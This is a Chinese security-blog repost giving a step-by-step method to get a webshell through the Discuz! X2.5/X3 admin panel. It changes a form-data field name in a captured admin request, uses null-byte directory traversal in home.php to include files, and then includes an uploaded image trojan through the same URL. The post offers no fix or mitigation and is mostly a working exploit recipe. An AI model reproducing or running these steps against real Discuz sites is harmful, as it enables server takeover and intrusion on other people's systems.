漏洞播报:discuz x 最新后台getshell详细利用方法

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

 

上班后看到wooyun社区发布了一个discuz  x3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。

好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!

经过研究发现,步骤错了。。。。

 

原帖地址内容:
http://zone.wooyun.org/content/3894

用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)

 

Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

 

改为

Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

 

 

访问
[coed]/home.php?mod=spacecp&id=../../robots.txt%0057[/code]

利用:

原帖测试的是dz x3,我测试的是dz x2.5  无视gpc

*********************************************************************

1.首先进后台,抓个包

 

2013052411300201

2.改包

Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

 

 改为

 

Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

 

提交

2013052411514402

3.提交过后访问
/home.php?mod=spacecp&id=../../robots.txt%00

2013052411523903

 

4.找个地方上传图片马

2013052412221104

 

5.访问图片马

http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00 

 

 

 

摘自:http://www.unhonker.com/bug/1217.html 

 

 

Tags:

discuz后台拿shell,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
漏洞播报:discuz x 最新后台getshell详细利用方法